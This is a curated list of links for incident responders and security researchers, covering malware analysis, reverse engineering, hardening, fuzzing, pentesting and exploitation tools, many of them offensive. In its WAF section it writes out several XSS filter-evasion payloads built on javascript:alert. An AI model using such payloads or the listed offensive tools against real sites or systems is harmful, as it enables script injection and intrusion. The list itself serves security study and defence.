CSIRT

*Please contribute through pull requests- ;)

Another great list: awesome-incident-response

Books

Nice list here by Cert.BR
Practical Cryptography for Developers, github
The Book of Secret Knowledge

Links

FIRST
- Cert.BR - useful links
- 7º Fórum Brasileiro de CSIRTs
SANS Pen-Testing Resources: Downloads
Some list of security projects
APT & CyberCriminal Campaign Collection
Repository containing Indicators of Compromise and Yara rules
Applying DevOps Principles in Incident Response
Encoding vs. Encryption vs. Hashing vs. Obfuscation
Shodan: is the world's first search engine for Internet-connected devices. Shodan 2000
ATTACK-Tools: Utilities for MITRE™ ATT&CK
hacking-tutorials
crypto: Lecture notes for a course on cryptography
tink: Tink is a multi-language, cross-platform library that provides cryptographic APIs that are secure, easy to use correctly, and hard(er) to misuse.
SPLOITUS: Exploit search engine.
Vulmon: Vulmon is a vulnerability search engine.
CIS SecureSuite® Membership
CRYPTO101: Crypto 101 is an introductory course on cryptography, freely available for programmers of all ages and skill levels.
Pagerduty Incident Response: This documentation covers parts of the PagerDuty Incident Response process.
- security-training: Public version of PagerDuty's employee security training courses.
- incident-response-docs: PagerDuty's Incident Response Documentation.
SMHasher is a test suite designed to test the distribution, collision, and performance properties of non-cryptographic hash functions. another repo

Hashing

MD5 Decryption

CVEs

Some CVEs stuff and links here and in here
MikroTik search on shodan.
TROMMEL: Sift Through Directories of Files to Identify Indicators That May Contain Vulnerabilities
cve_manager: A python script that a) parses NIST NVD CVEs, b) prcoesses and exports them to CSV files, c) creates a postgres database and imports all the data in it, d) provides query capabilities for this CVEs database.

Malware Analysis

Great online course by MalwareUnicorn
Some other botnets list
IKARUS anti.virus and its 9 exploitable kernel vulnerabilities
Digital Certificates Used by Malware
Signed Malware – The Dataset
Malware Sample Sources for Researchers
Indicators: Champing at the Cyberbit
Limon - Sandbox for Analyzing Linux Malwares
A Dynamic Binary Instrumentation framework based on LLVM
Framework for building Windows malware, written in C++
binary ninja
Analyzing a New macOS DNS Hijacker: OSX/MaMi
A PoC "malware" application with good intentions that aims to stress your anti-malware system: al-khaser
Great analysis of mal100.evad.spre.rans.spyw.troj.winEXE@34/9@31/10
Chaos: a Stolen Backdoor Rising Again
Malware Indicators of Compromise (IOCs)
Puszek:Yet another LKM rootkit for Linux. It hooks syscall table.
Joe Sandbox Cloud is a deep malware analysis platform which detects malicious files - API Wrapper.
EternalGlue part two: A rebuilt NotPetya gets its first execution outside of the lab
Malware web and phishing investigation by Decent Security.
A collection of tools for working with TrickBot
Forgot About Default Accounts? No Worries, GoScanSSH Didn’t
EMOTET: EMOTET INFECTIONS WITH ZEUS PANDA BANKER AND TRICKBOT (GTAG: DEL34)
RegRipper version 2.8 (source code)
makin - reveal anti-debugging and anti-VM tricks.
TESSERACT: Eliminating Experimental Bias in Malware Classification across Space and Time
colental/byob: BYOB (Build Your Own Botnet), another byob
Source Code for Exobot Android Banking Trojan Leaked Online
Pegasus: analysis of network behavior
Ramnit’s Network of Proxy Servers
snake: a malware storage zoo
A malware analysis kit for the novice
malware-ioc: Indicators of Compromises (IOC) of our various investigations
pftriage: Python tool and library to help analyze files during malware triage and analysis.
imaginaryC2: Imaginary C2 is a python tool which aims to help in the behavioral (network) analysis of malware. Imaginary C2 hosts a HTTP server which captures HTTP requests towards selectively chosen domains/IPs. Additionally, the tool aims to make it easy to replay captured Command-and-Control responses/served payloads.
When a malware is more complex than the paper.
Vba2Graph: Vba2Graph - Generate call graphs from VBA code, for easier analysis of malicious documents.
malwoverview: Malwoverview.py is a first response tool to perform an initial and quick triage on either a directory containing malware samples or a specific malware sample.
SECT CTF 2018 :: Gh0st, More Smoked Leet Chicken
What you need to know about “LoJax”—the new, stealthy malware from Fancy Bear
Linux.Malware: Additional Material for the Linux Malware Paper
PHP Malware Examination
Analysis of Linux.Haikai: inside the source code
Cylance vs. MBRKiller Wiper Malware.
Deep Analysis of TrickBot New Module pwgrab
multiscanner: Modular file scanning/analysis framework.
FCL: FCL (Fileless Command Lines) - Known command lines of fileless malicious executions.
Mac malware combines EmPyre backdoor and XMRig miner
The Full Guide Understanding Fileless Malware Infections
'Injection' Without Injection
Analysis of Neutrino Bot Sample (dated 2018-08-27): In this post I analyze a Neutrino Bot sample.
pafish: Pafish is a demonstration tool that employs several techniques to detect sandboxes and analysis environments in the same way as malware families do.
Thunderstrike2 details: This is the annotated transcript of our DefCon 23 / BlackHat 2015 talk, which presented the full details of Thunderstrike 2, the first firmware worm for Apple's Macs that can spread via both software or Thunderbolt hardware accessories and writes itself to the boot flash on the system's motherboard.
Malboxes: a Tool to Build Malware Analysis Virtual Machines, github
Triton is the world’s most murderous malware, and it’s spreading
Cloak and Dagger — Mobile Malware Techniques Demystified
IceBox: Icebox is a Virtual Machine Introspection solution that enable you to stealthily trace and debug any process (kernel or user). It's based on project Winbagility.
Malware Development:
- Welcome to the Dark Side: Part 1
- Welcome to the Dark Side: Part 2-1
- Welcome to the Dark Side: Part 2-2
- Welcome to the Dark Side: Part 3
- Welcome to the Dark Side: Part 4
Command and Control via TCP Handshake
Joel Sandbox Analysis Report wdeQEksXgm
emotet: Daily Emotet IoCs and Notes for 09/18/19

Samples

Automated Malware Analysis Report for D6pnpvG2z7 - Generated by Joe Sandbox
Mac Malware
virii: Collection of ancient computer virus source codes
Detricking TrickBot Loader: TrickBot (TrickLoader) is a modular financial malware that first surfaced in October in 20161. Almost immediately researchers have noticed similarities with a credential-stealer called Dyre. It is still believed that those two families might’ve been developed by the same actor. decoder, tweet
Current Emotet Epoch 2 C2 as of 2019-09-26 07:54 US/Eastern
abuse.ch Feodo Tracker Botnet C2 IP Blocklist

Repos

A repository of LIVE malwares for your own joy and pleasure: theZoo
malware.one is a binary substring searchable malware catalog containing terabytes of malicious code.
Beginner Malware Reversing Challenges, by MalwareTech. repo

Ransomwares

Ransomware decryption tool
Schroedinger’s Pet(ya)
Player 3 Has Entered the Game: Say Hello to 'WannaCry'
WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm
Ransomware Overview
Analyzing GrandSoft Exploit Kit and code
Rapidly Evolving Ransomware GandCrab Version 5 Partners With Crypter Service for Obfuscation
hidden-tear: It's a ransomware-like file crypter sample which can be modified for specific purposes.

Virus/Anti-Virus

Avast open-sources its machine-code decompiler
Morris worm
make a process unkillable?! (windows 10)
Attack inception: Compromised supply chain within a supply chain poses new risks – Microsoft Secure.
Curtis' Blog: Bypassing Next Gen AV During a Pentest
Inception: Provides In-memory compilation and reflective loading of C# apps for AV evasion.
Invoke-NeutralizeAV: Quick PoC I Wrote for Bypassing Next Gen AV Remotely for Pentesting.
BinariesThatDoesOtherStuff
Circlean: USB key cleaner
The ELF Virus Writing HOWTO
mcreator: Encoded Reverse Shell Generator With Techniques To Bypass AV's.
metame: is a simple metamorphic code engine for arbitrary executables.

Trojans/Loggers

IcedID Banking Trojan Shares Code with Pony 2.0 Trojan
Turla: In and out of its unique Outlook backdoor
QMKhuehuebr: Trying to hack into keyboards

Malware Articles

“VANILLA” malware: vanishing antiviruses by interleaving layers and layers of attacks

Reverse Engineering

Dangers of the Decompiler
RE guide for beginners: Methodology and tools
REDasm: Crossplatform, interactive, multiarchitecture disassembler
Reversing ARM Binaries
Programmer De-anonymization from Binary Executables
syntia: Program synthesis based deobfuscation framework for the USENIX 2017 paper "Syntia: Synthesizing the Semantics of Obfuscated Code"
Reverse engineering WhatsApp Web
BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
BOLO: Reverse Engineering — Part 2 (Advanced Programming Concepts)
Reverse Engineering for Beginners
VivienneVMM: VivienneVMM is a stealthy debugging framework implemented via an Intel VT-x hypervisor.
Xori: Custom disassembly framework
rattle: Rattle is an EVM binary static analysis framework designed to work on deployed smart contracts.
starshipraider: High performance embedded systems debug/reverse engineering platform
GBA-IDA-Pseudo-Terminal: IDAPython tools to aid with analysis, disassembly and data extraction using IDA python commands, tailored for the GBA architecture at some parts
binja-ipython: A plugin to integrate an IPython kernel into Binary Ninja.
PySameSame: This is a python version of samesame repo to generate homograph strings
Reversing a Japanese Wireless SD Card From Zero to Code Execution
Practical-Reverse-Engineering-using-Radare2: Training Materials of Practical Reverse Engineering using Radare2
idaemu: idaemu is an IDA Pro Plugin - use for emulating code in IDA Pro.
LIEF: Library to Instrument Executable Formats (github)
pwndbg: Exploit Development and Reverse Engineering with GDB Made Easy
DEBIN: Predicting Debug Information in Stripped Binaries
Analyzing ARM Cortex-based MCU firmwares using Binary Ninja
lighthouse: Code Coverage Explorer for IDA Pro & Binary Ninja
Manticore: Symbolic Execution Tool For Analysis Of Binaries And Smart Contracts. manticore: Symbolic execution tool
Beam me up, CFG.: Earlier in 2018 while revisiting the Delay Import Table, I used dumpbin to check the Load Configuration data of a file and noticed new fields in it. And at the time of writing this, more fields were added! The first CFGuard caught my attention and I learned about Control Flow Guard, it is a new security feature. To put it simple, it protects the execution flow from redirection - for example, from exploits that overwrite an address in the stack. Maybe they should call it the Security Directory instead.
Getting Started with Frida Tools
Frida hooking android :part 1, part 2, part 3, part 4 and part 5
PBA - Analysis Tools: My own versions from the programs of the book "Practical Binary Analysis"
functrace: is a tool that helps to analyze a binary file with dynamic instrumentation using DynamoRIO
Signature-Base: signature-base is the signature database for my scanners LOKI and SPARK Core.
- Generic Anomalies: Detects an embedded executable in a non-executable file
Virtuailor: IDAPython tool for C++ vtables reconstruction.
Linux Reverse Engineering CTFs for Beginners.
execution-trace-viewer: Tool for viewing and analyzing execution traces
Reverse Engineering of a Not-so-Secure IoT Device
Python for Reverse Engineering 1: ELF Binaries
Kaitai Struct: A new way to develop parsers for binary structures.
findLoop: find possible encryption/decryption or compression/decompression code.
mkYARA: Writing YARA rules for the lazy analyst (github)
Reverse Engineering 'A Link to the Past (GBA)' ep 1
wiggle: The concepting self hosted executable binary search engine.
Python for Reverse Engineering 1: ELF Binaries
uncompyle6: A cross-version Python bytecode decompiler
Decompyle++: C++ python bytecode disassembler and decompiler
Reverse engineering Go binaries using Radare 2 and Python
bearparser
EFISwissKnife: An IDA plugin to improve (U)EFI reversing.
Reverse-engineering precision op amps from a 1969 analog computer
CPU Adventure – Unknown CPU Reversing: We reverse-engineered a program written for a completely custom, unknown CPU architecture, without any documentation for the CPU (no emulator, no ISA reference, nothing) in the span of ten hours. Read on to find out how we did it…

Ghidra

ghidra-firmware-utils: Ghidra utilities for analyzing firmware
dragondance: Binary code coverage visualizer plugin for Ghidra
Decompiler Analysis Engine: Welcome to the Decompiler Analysis Engine. It is a complete library for performing automated data-flow analysis on software, starting from the binary executable.
Working With Ghidra's P-Code To Identify Vulnerable Function Calls
GhIDA: Ghidra decompiler for IDA Pro.
Ghidraaas: Ghidra as a Service
SVD-Loader for Ghidra: Simplifying bare-metal ARM reverse engineering. repo
GhidraX64Dbg: Extract annoations from Ghidra into an X32/X64 dbg database.

Frameworks

Inject code into running Python processes
malspider: Malspider is a web spidering framework that detects characteristics of web compromises.
AIL-framework: AIL framework - Analysis Information Leak framework

Patching

Did Microsoft Just Manually Patch Their Equation Editor Executable? Why Yes, Yes They Did. (CVE-2017-11882)

Hardening

See your site config with Hardenize
Nice article with a lot of resources: Common approaches to securing Linux servers and what runs on them.
Secure Secure Shell by stribika
A lot of good posts by geek flare:
- How to Configure SSL Certificate on Google Cloud Load Balancer?
- Nginx Web Server Security & Hardening Guide
- IBM HTTP Server Security & Hardening Guide
- Apache Tomcat Hardening and Security Guide
- How to Enable TLS 1.3 in Nginx, Cloudflare?
- Apache Web Server Hardening & Security Guide (broken!??)
List of sites with two factor auth
yubikey-ssh-setup
This is a practical guide to using YubiKey as a SmartCard for storing GPG encryption and signing keys.
solo-hw: Hardware sources for Solo
Sarlacc is an SMTP server that I use in my malware lab to collect spam from infected hosts.
linux-hardened: Minimal supplement to upstream Kernel Self Protection Project changes.
upvote: A multi-platform binary whitelisting solution
ssh-auditor: The best way to scan for weak ssh passwords on your network
iptables-essentials: Iptables Essentials: Common Firewall Rules and Commands.
reconbf: Recon system hardening scanner
FirewallChecker: A self-contained firewall checker
Implementing Least-Privilege Administrative Models
BlueWars: Capture The Flag Defensivo que aconteceu na H2HC
Iptables Essentials: Common Firewall Rules and Commands.
prowler: AWS Security Best Practices Assessment, Auditing, Hardening and Forensics Readiness Tool. It follows guidelines of the CIS Amazon Web Services Foundations Benchmark and additional checks. Official CIS for AWS guide.
nftables: nftables is the successor to iptables. It replaces the existing iptables, ip6tables, arptables and ebtables framework. It uses the Linux kernel and a new userspace utility called nft. nftables provides a compatibility layer for the ip(6)tables and framework.
CCAT: Cisco Config Analysis Tool
Keystone Project. Github: Keystone Enclave
Zero-knowledge attestation
9 Kubernetes Security Best Practices Everyone Must Follow
Secure & Ad-free Internet Anywhere With Streisand and Pi Hole
Streisand sets up a new server running your choice of WireGuard, OpenConnect, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, or a Tor bridge. It also generates custom instructions for all of these services. At the end of the run you are given an HTML file with instructions that can be shared with friends, family members, and fellow activists.
ERNW Repository of Hardening Guides: This repository contains various hardening guides compiled by ERNW for various purposes.
The Practical Linux Hardening Guide: 🔥 This guide details the planning and the tools involved in creating a secure Linux production systems - work in progress.
security.txt: A proposed standard which allows websites to define security policies.
How To Secure A Linux Server: An evolving how-to guide for securing a Linux server.
opmsg: is a replacement for gpg which can encrypt/sign/verify your mails or create/verify detached signatures of local files. Even though the opmsg output looks similar, the concept is entirely different.
Ciderpress: Hardened wordpress installer

Apache

Apache Security by Ivan Ristić
dotdotslash: An tool to help you search for Directory Traversal Vulnerabilities
A new security header: Feature Policy

Web

snuffleupagus: Security module for php7 - Killing bugclasses and virtual-patching the rest!
FOPO-PHP-Deobfuscator: A simple script to deobfuscate PHP file obfuscated with FOPO Obfuscator
Decode.Tools: Decode PHP Obfuscator by FOPO

Credentials

Search if your credentials where leaked: Cr3dOv3r
pw-pwnage-cfworker: Deploy a Cloudflare Worker to sanely score users' new passwords with zxcvbn AND check for matches against haveibeenpwned's 5.1+ billion breached accounts
XSS Exploit code for retrieving passwords stored in a Password Vault
login_duress: A BSD authentication module for duress passwords
XSStrike: Most advanced XSS detection suite.
Was my password leaked? pwndb: Search for creadentials leaked on pwndb.
bitwarden_rs: Unofficial Bitwarden compatible server written in Rust
pcfg_cracker: Probabilistic Context Free Grammar (PCFG) password guess generator

Secure Programming

Hardening C/C++ Programs Part II – Executable-Space Protection and ASLR
Checklist of the most important security countermeasures when designing, testing, and releasing your API
sanitizers
Gitian is a secure source-control oriented software distribution method.
Canary:Input Detection and Response
Canarytokens by Thinkst, Quick, Free, Detection for the Masses
Wycheproof: Project Wycheproof tests crypto libraries against known attacks.
Web App Security 101: Keep Calm and Do Threat Modeling
SSL/TLS for dummies:
- part 1: Ciphersuite, Hashing, Encryption;
- part 2: Understanding key exchange algorithm;
- part 3: Understanding Certificate Authority.
heaphopper: HeapHopper is a bounded model checking framework for Heap-implementations
Ristretto is a technique for constructing prime order elliptic curve groups with non-malleable encodings.
SEI CERT C Coding Standard: The C rules and recommendations in this wiki are a work in progress and reflect the current thinking of the secure coding community. Because this is a development website, many pages are incomplete or contain errors. As rules and recommendations mature, they are published in report or book form as official releases. These releases are issued as dictated by the needs and interests of the secure software development community.
- MSC24-C. Do not use deprecated or obsolescent functions
- US-CERT: memcpy_s() and memmove_s()
Safe C Library: The Safe C Library provides bound checking memory and string functions per ISO/IEC TR24731. These functions are alternative functions to the existing standard C library that promote safer, more secure programming.
Field Experience With Annex K — Bounds Checking Interfaces
TSLint: An extensible linter for the TypeScript language.
rubocop: A Ruby static code analyzer and formatter, based on the community Ruby style guide.
Librando: transparent code randomization for just-in-time compilers
Checked C: Making C Safe by Extension. github
Practical case: Buffer Overflow 0x01
pigaios: A tool for diffing source codes directly against binaries. slides
pigaios: A tool for diffing source codes directly against binaries. slides
A Git Horror Story: Repository Integrity With Signed Commits. How to use git securely (signing commits)
An Introduction to Dynamic Symbolic Execution and the KLEE Infrastructure
Tooling for verification of PGP signed commits
tlse: Single C file TLS 1.2/1.3 implementation, using tomcrypt as crypto library
tinyalloc: malloc / free replacement for unmanaged, linear memory situations (e.g. WASM, embedded devices...)
Sandboxed API: Sandboxed API automatically generates sandboxes for C/C++ libraries
HACL*: a formally verified cryptographic library written in F*
Villoc: Villoc is a heap visualisation tool, it's a python script that renders a static html file.
How C array sizes become part of the binary interface of a library
Insecure Direct Object References
MazuCC: A minimalist C compiler with x86_64 code generation
When the going gets tough: Understanding the challenges with Product commoditization in SCA.
huskyCI: huskyCI is an open source tool that performs security tests inside CI pipelines of multiple projects and centralizes all results into a database for further analysis and metrics.
(pt-br) GTER 47 | GTS 33 - Dia 2 (parte 1): nice talk by Daniel Carlier and Silvia Pimpão.
secDevLabs: A laboratory for learning secure web development in a practical manner.
HTTP Security Headers - A Complete Guide
SAFECode: is a non-profit organization exclusively dedicated to increasing trust in information and communications technology products and services through the advancement of effective software assurance methods.
OWASP Broken Web Applications Project. OWASP BWA repository files.
Security Code Review 101

Fuzzing

Generating Software Tests (github)
afl-unicorn: Fuzzing Arbitrary Binary Code
Regaxor: A regular expression fuzzer
BrokenType: TrueType and OpenType font fuzzing toolset
Dizzy-legacy: Network and USB protocol fuzzing toolkit.
Start-Hollow.ps1: My musings with PowerShell
auditd-attack: A Linux Auditd rule set mapped to MITRE's Attack Framework
Dizzy-legacy: Network and USB protocol fuzzing toolkit.
BFuzz: Fuzzing Browsers
Structure-Aware Fuzzing with libFuzzer with fuzzer test suite
Fuzzilli: A JavaScript Engine Fuzzer.
Materials from Fuzzing Bay Area meetups.

API

The Web API Checklist: 43 Things To Think About When Designing, Testing, and Releasing your API
API-Security-Checklist: Checklist of the most important security countermeasures when designing, testing, and releasing your API
REST API Checklist
Your Comprehensive Web API Design Checklist
API Security Testing: Rules And Checklist
API Security Testing - How to Hack an API and Get Away with It:
API Security Checklist: Checklist of the most important security countermeasures when designing, testing, and releasing your API

REST

REST API Testing Tutorial: Sample Manual Test Case
REST Security Cheat Sheet: CheatSheetSeries
Penetration Testing RESTful Web Services
RESTful web services penetation testing
Astra: Automated Security Testing for REST API’s

CTFs

The fast, easy, and affordable way to train your hacking skills.
Write-ups for crackmes and CTF challenges by eleemosynator
pwntools: CTF framework and exploit development library
google-ctf
Pwn2Win 2018. unsolved
Leap Security
35c3ctf-challs
ctf-tasks: An archive of low-level CTF challenges developed over the years.
$50 million CTF Writeup.
Alice sent Bob a meme - UTCTF 2019. tl;dr: Extract data from given images using binwalk, Tranform given diophantine equation into a cubic curve and retrieve EC parameters, Solve ECDLP given in extracted data using Pohlig Hellman Algorithm.
linux-smart-enumeration: Linux enumeration tool for pentesting and CTFs with verbosity levels
RsaCtfTool: RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data

Phreak

Archs

ARM LAB ENVIRONMENT
Azure IoT HUB
A collection of vulnerable ARM binaries for practicing exploit development
arm vm working out of the box for everyone
Statically compiled ARM binaries for debugging and runtime analysis.
Hacker Finds Hidden 'God Mode' on Old x86 CPUs -> rosenbridge: Hardware backdoors in some x86 CPUs
USBHarpoon Is a BadUSB Attack with A Twist
Ground Zero: Part 3-2 Patching Binaries with Radare2 - ARM64
A 2018 practical guide to hacking RFID/NFC
riscv-ida: RISC-V ISA processor module for IDAPro 7.x
mac-age: MAC address age tracking
OpenWRT em Mikrotik Routerboard 750
Lexra: Lexra did implement a 32-bit variant of the MIPS architecture.
IntelTEX-PoC: Intel Management Engine JTAG Proof of Concept
me_cleaner: Tool for partial deblobbing of Intel ME/TXE firmware images.
Potential candidate for open source bootloaders? Complete removal of Intel ME firmware possible on certain Intel HEDT/Server platforms
me_removal: Testing complete ME removal on Intel HEDT systems
IDA-scripts: IDAPro scripts/plugins
Why is My Perfectly Good Shellcode Not Working?: Cache Coherency on MIPS and ARM.
Something about IR optimization: Hi hackers! Today I want to write about optimizing IR in the MoarVM JIT, and also a little bit about IR design itself.
Dragonblood: Analysing WPA3's Dragonfly Handshake
Arm Heap Exploitation, by Azeria:
- AZM Online Arm Assembler
- Part 1: Understanding the Glibc Heap Implementation
- Part 2: Understanding the GLIBC Heap Implementation
- Heap Exploit Development– Case study from an in-the-wild iOS 0-day. thread
The Hacker's Hardware Toolkit: The best hacker's gadgets for Red Team pentesters and security researchers.
Unfixable Seed Extraction on Trezor - A practical and reliable attack. An attacker with a stolen device can extract the seed from the device. It takes less than 5 minutes and the necessary materials cost around 100$.
Extracting seed from Ellipal wallet
Breaking Trezor One with Side Channel Attacks: A Side Channel Attack on PIN verification allows an attacker with a stolen Trezor One to retrieve the correct value of the PIN within a few minutes.
Rewriting Functions in Compiled Binaries

Pentesting

Seclists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place.
Search operating systems on the network: osquery
osquery Across the Enterprise
Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection
Zero Day Zen Garden: Windows Exploit Development - Part 0
Zero Day Zen Garden: Windows Exploit Development - Part 1
Zero Day Zen Garden: Windows Exploit Development - Part 2
Zero Day Zen Garden: Windows Exploit Development - Part 3
Zero Day Zen Garden: Windows Exploit Development - Part 4
Got Meterpreter? PivotPowPY!
Pentest Tips and Tricks
Ethical Hacking Course: Enumeration Theory
Script to steal passwords from ssh.
Network Infrastructure Penetration Testing Tool
Shellen:Interactive shellcoding environment to easily craft shellcodes
tcp connection hijacker
"EAST" PENTEST FRAMEWORK
Pown.js: is the security testing an exploitation framework built on top of Node.js and NPM.
Sandmap is a tool supporting network and system reconnaissance using the massive Nmap engine.
trackerjacker: Like nmap for mapping wifi networks you're not connected to, plus device tracking
TIDoS-Framework: The offensive web application penetration testing framework.
massh-enum: OpenSSH 7.x Mass Username Enumeration.
GitMiner: Tool for advanced mining for content on Github
DHCPwn: All your IPs are belong to us.
badKarma: advanced network reconnaissance toolkit.
Danger-zone: Correlate data between domains, IPs and email addresses, present it as a graph and store everything into Elasticsearch and JSON files.
go-tomcat-mgmt-scanner: A simple scanner to find and brute force tomcat manager logins
IoTSecurity101: From IoT Pentesting to IoT Security
subscraper: External pentest tool that performs subdomain enumeration through various techniques. In addition, SubScraper will provide information such as HTTP & DNS lookups to aid in potential next steps.
red_team_telemetry
SharpSploitConsole: SharpSploit Console is just a quick proof of concept binary to help penetration testers or red teams with less C# experience play with some of the awesomeness that is SharpSploit.
CrackMapExec: A swiss army knife for pentesting networks
Sublist3r: Fast subdomains enumeration tool for penetration testers
DarkSpiritz: A penetration testing framework for Linux, MacOS, and Windows systems.
proxycannon-ng: A private botnet using multiple cloud environments for pentesters and red teamers. - Built by the community during a hackathon at the WWHF 2018 security conference
PentestHardware: Kinda useful notes collated together publicly
novahot:A webshell framework for penetration testers.
MarkBaggett’s gists: This is a collection of code snippets used in my Pen Test Hackfest 2018 Presentation.
Serverless Toolkit for Pentesters
pentest_scripts: scrapes linkedin and generates emails list.
Penetration Testing Tools Cheat Sheet ∞: Penetration testing tools cheat sheet, a quick reference high level overview for typical penetration testing engagements. Designed as a quick reference cheat sheet providing a high level overview of the typical commands you would run when performing a penetration test.
shellver: Reverse Shell Cheat Sheet TooL
IVRE: Network recon framework (github).
(pt-br) DomainInformation: Tool para a identificação de arquivos, pastas, servidores DNS, E-mail. Tenta fazer transferência de zona, Busca por subdomínios e por ultimo, procura por portas abertas em cada ip dos subdomínios.. Desfrutem =)
GTRS: GTRS - Google Translator Reverse Shell
shellcode2asmjs: Automatically generate ASM.JS JIT-Spray payloads
LeakLooker: Find Open Databases in Seconds. github
pown-recon: A powerful target reconnaissance framework powered by graph theory.
Micro8: The Micro8 series is suitable for junior and intermediate security practitioners, Party B security testing, Party A security self-test, network security enthusiasts, etc., enterprise security protection and improvement, the series complies with: Free, free, shared, open source.
Payloads All The Things: A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques!
Penetration Test Guide based on the OWASP + Extra: This guid is for the penetration testers seeking for the appropriate test cases required during a penetration test project. I rearranged the OWASP Testing Guide v4 from my point of view including 9 Test Classes and each class has several Test Cases to conduct against the target. Each Test Case covers several OWASP tests which also is useful for the report document. I've also added 15 extra Tests Cases marked by the EXTRA-TEST. I hope it will be useful in both penetration test projects and bug-bounty.
- Insecure Direct Object References (OTG-AUTHZ-004)
Order of the Overflow Proxy Service
liffy: Local file inclusion exploitation tool
foxyproxy.json: Some of these might be legacy and no longer catching any traffic, but unless you're actually pentesting Mozilla or Google, it shouldn't matter
pentest_compilation: Compilation of commands, tips and scripts that helped me throughout Vulnhub, Hackthebox, OSCP and real scenarios.
Linux for Pentester: ZIP Privilege Escalation
Presentation Clickers: Keystroke injection vulnerabilities in wireless presentation clickers.
Better API Penetration Testing with Postman:
- Part 1
- Part 2
- Part 3
- Part 4
DNS and DHCP Recon using Powershell
REST Assured: Penetration Testing REST APIs Using Burp Suite:
- Part 1 – Introduction & Configuration
- Part 2 – Testing
- Part 3 – Reporting
SiteBroker: A cross-platform python based utility for information gathering and penetration testing automation!

Reporting

public-pentesting-reports. Curated list of public penetration test reports released by several consulting firms and academic security groups
report-ng: Generate MS Word template-based reports with HP WebInspect / Burp Suite Pro input, own custom data and knowledge base.
PandocPentestReport: This repository shows my effort to create a pandoc based pentest report template.
Technical Report template: LaTeX template for technical reports

OSINT - Open Source INTelligence

Slides from my ShellCon Talk, OSINT for Pen Tests, given 10/19.
OSINT tool for visualizing relationships between domains, IPs and email addresses.
sn0int: Semi-automatic OSINT framework and package manager
A Pentester’s Guide – Part 1: OSINT – Passive Recon and Discovery of Assets
A Pentester’s Guide - Part 2: OSINT – LinkedIn is Not Just for Jobs
iKy: I Know You (OSINT project)
Gitrob: Putting the Open Source in OSINT
OSint Tools: On this page you’ll find tools which you can help do your OSINT reseach.
datasploit: An #OSINT Framework to perform various recon techniques on Companies, People, Phone Number, Bitcoin Addresses, etc., aggregate all the raw data, and give data in multiple formats.
the-endorser: An OSINT tool that allows you to draw out relationships between people on LinkedIn via endorsements/skills.
OSINT-y Goodness: HathiTrust Digital Library
OSINT Resources for 2019
Awesome OSINT: 😱 A curated list of amazingly awesome OSINT

Vulnerability

Striker is an offensive information and vulnerability scanner
SQL Vulnerability Scanner
Decentralized Application Security Project, github
BLEAH: A BLE scanner for "smart" devices hacking.
Introduction to IDAPython for Vulnerability Hunting — Somerset Recon
Beating the OWASP Benchmark
CMSScan: Scan Wordpress, Drupal, Joomla, vBulletin websites for Security issues.
SSRF Tips: some tips with Server Side Request Forgery.
Meteor Blind NoSQL Injection
Security Bulletins that relate to Netflix Open Source

WAFs

Web Application Penetration Testing Course URLs
Web Application Penetration Testing Notes
quarantyne: Modern Web Firewall: stop account takeovers, weak passwords, cloud IPs, DoS attacks, disposable emails
Burp Suite:
- Awesome Burp Extensions: A curated list of amazingly awesome Burp Extensions
- BurpSuiteHTTPSmuggler: A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques
- AutoRepeater: Automated HTTP Request Repeating With Burp Suite
- AES-Killer v3.0: Burp Plugin To Decrypt AES Encrypted Traffic Of Mobile Apps On The Fly
- Femida-xss: Automated blind-xss search for Burp Suite
- dotNetBeautifier: A BurpSuite extension for beautifying .NET message parameters and hiding some of the extra clutter that comes with .NET web apps (i.e. __VIEWSTATE).
- Java-Deserialization-Scanner: All-in-one plugin for Burp Suite for the detection and the exploitation of Java deserialization vulnerabilities.
- JavaSerialKiller: Burp extension to perform Java Deserialization Attacks.
- BurpBounty: Burp Bounty (Scan Check Builder in BApp Store) is a extension of Burp Suite that improve an active and passiv
- Howto install and use the Burp Suite as HTTPS Proxy on Ubuntu 14.04
Sitadel: Web Application Security Scanner.
WAF through the eyes of hackers
Some nice payloads to bypass XSS WAF:

'';!--"<XSS>=&{()}

<IMG SRC="javascript:alert('XSS');">

<IMG SRC="jav&#x09;ascript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

Exploits

IOSurface exploit
Attacking a co-hosted VM: A hacker, a hammer and two memory modules
How To Create a Metasploit Module
Installing Metasploit Pro, Ultimate, Express, and Community
unfurl, An Entropy-Based Link Vulnerability Analysis Tool
A collection of vulnerable ARM binaries for practicing exploit development
A collection of PHP exploit scripts
Sage ACF Blocks: A Sage 10 helper package for building ACF blocks rendered using blade templates.
WebKit exploit
Modern Binary Exploitation - Spring 2015
DriveCrypt: DriveCrypt Dcr.sys vulnerability exploit
Faxploit: Sending Fax Back to the Dark Ages
beebug: A tool for checking exploitability
NAVEX: Precise and scalable exploit generation for dynamic web applications
Three New DDE Obfuscation Methods
SILENTTRINITY: A post-exploitation agent powered by Python, IronPython, C#/.NET
fuxploider: File upload vulnerability scanner and exploitation tool.
Jailbreaks Demystified – GeoSn0w – Programmer. Hacking stuff.
LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks
linpostexp: Linux post exploitation enumeration and exploit checking tools
Attacking Google Authenticator
Pacu: The AWS exploitation framework, designed for testing the security of Amazon Web Services environments. installation guide, starting guide
Glibc Heap Exploitation Basics:
- Introduction to ptmalloc2 internals (Part 1)
- ptmalloc2 internals (Part 2) - Fast Bins and First Fit Redirection
movfuscator: The single instruction C compiler
beebug: A tool for checking exploitability
UEFI vulnerabilities classification focused on BIOS implant delivery and What makes OS drivers dangerous for BIOS?
MikroTik Firewall & NAT Bypass
3D Accelerated Exploitation: The content of this repository is meant to be the official release of the tooling/exploit that was discussed during the OffensiveCon 2019 talk - 3D Accelerated Exploitation. The talk dealt with research into the VirtualBox 3D Acceleration feature, which is backed by a software component called Chromium.
GhostDelivery: Python script to generate obfuscated .vbs script that delivers payload (payload dropper) with persistence and windows antivirus disabling functions.
Beat the hole in the ATM: hacking an diebold ATM.
